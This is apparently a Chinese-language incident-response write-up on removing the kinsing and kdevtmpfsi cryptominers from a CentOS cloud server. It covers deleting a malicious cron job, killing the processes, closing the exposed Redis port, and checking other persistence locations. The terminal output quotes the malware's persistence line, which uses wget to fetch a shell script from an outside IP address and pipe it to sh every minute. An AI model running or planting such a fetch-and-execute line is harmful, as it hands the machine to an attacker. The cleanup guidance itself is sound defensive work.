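清理云服务器挖矿病毒kdevtmpfsi和kinsing

处理过程分三步:先用 crontab -e 删除每分钟从 185.122.204.197 下载并执行 scg.sh 的定时任务,再结束 kinsing 和 kdevtmpfsi 进程并删除对应文件,最后在防火墙中关闭对公网开放的 6379 端口。定时任务要先于进程清理:它每分钟执行一次,如果留着,刚杀掉的进程很快会被重新拉起。
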
[root@VM-12-13-centos step-gateway]# crontab -l
# secu-tcs-agent monitor, install at Sun Mar 13 17:00:40 CST 2022
* * * * * /usr/local/sa/agent/secu-tcs-agent-mon-safe.sh > /dev/null 2>&1
* * * * * wget -q -O - http://185.122.204.197/scg.sh | sh > /dev/null 2>&1
[root@VM-12-13-centos step-gateway]# crontab -e
crontab: installing new crontab
[root@VM-12-13-centos step-gateway]# crontab -l
# secu-tcs-agent monitor, install at Sun Mar 13 17:00:40 CST 2022
* * * * * /usr/local/sa/agent/secu-tcs-agent-mon-safe.sh > /dev/null 2>&1
[root@VM-12-13-centos step-gateway]# ps -aux | grep kdevtmpfsi
root      359186  0.0  0.0 308016  2412 ?        Ssl  23:22   0:00 /tmp/kdevtmpfsi
root      359692  0.0  0.0  12136  1100 pts/0    S+   23:25   0:00 grep --color=auto kdevtmpfsi
[root@VM-12-13-centos step-gateway]# ps -aux | grep kinsing
root      332241  0.0  0.7 710608 28072 ?        Sl   20:56   0:01 /etc/kinsing
root      359710  0.0  0.0  12136  1124 pts/0    S+   23:25   0:00 grep --color=auto kinsing
[root@VM-12-13-centos step-gateway]# kill -9 332241
[root@VM-12-13-centos step-gateway]# kill -9 359186
[root@VM-12-13-centos step-gateway]# rm -f /tmp/kdevtmpfsi /etc/kinsing 
[root@VM-12-13-centos step-gateway]# ps -aux | grep kdevtmpfsi
root      360008  0.0  0.0  12136  1160 pts/0    S+   23:27   0:00 grep --color=auto kdevtmpfsi
[root@VM-12-13-centos step-gateway]# ps -aux | grep kinsing
root      360017  0.0  0.0  12136  1156 pts/0    S+   23:27   0:00 grep --color=auto kinsing
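[root@VM-12-13-centos step-gateway]# 

再次执行 ps 时只剩 grep 自身这一行,说明两个进程已经结束。接下来处理暴露面:防火墙 public 区域放行了 6379/tcp(Redis 默认端口),对公网开放的 Redis 是这类挖矿程序常见的入侵入口;本文没有日志可以证实这一点,属于推测。如果业务仍需使用 Redis,除了关闭端口,还应让它只监听内网地址并设置访问密码。
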
[root@VM-12-13-centos ~]# firewall-cmd --zone=public --list-ports
80/tcp 443/tcp 22/tcp 8848/tcp 6379/tcp
[root@VM-12-13-centos ~]# firewall-cmd --zone=public --remove-port=6379/tcp --permanent
success
[root@VM-12-13-centos ~]# firewall-cmd --reload
success
[root@VM-12-13-centos ~]# firewall-cmd --zone=public --list-ports
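80/tcp 443/tcp 22/tcp 8848/tcp

清理后建议继续观察几分钟,确认 crontab 和这两个进程没有再次出现,并检查其他可能的持久化位置:/etc/cron.d、/var/spool/cron 下各用户的定时任务、systemd 服务、/etc/ld.so.preload,以及 ~/.ssh/authorized_keys 中是否有陌生公钥。8848/tcp 仍对公网开放(通常是 Nacos 的默认端口,需自行确认),如果不需要公网访问也应关闭或开启鉴权。由于恶意进程以 root 身份运行过,更稳妥的做法是更换本机上的密码和密钥,条件允许时用干净镜像重建实例。
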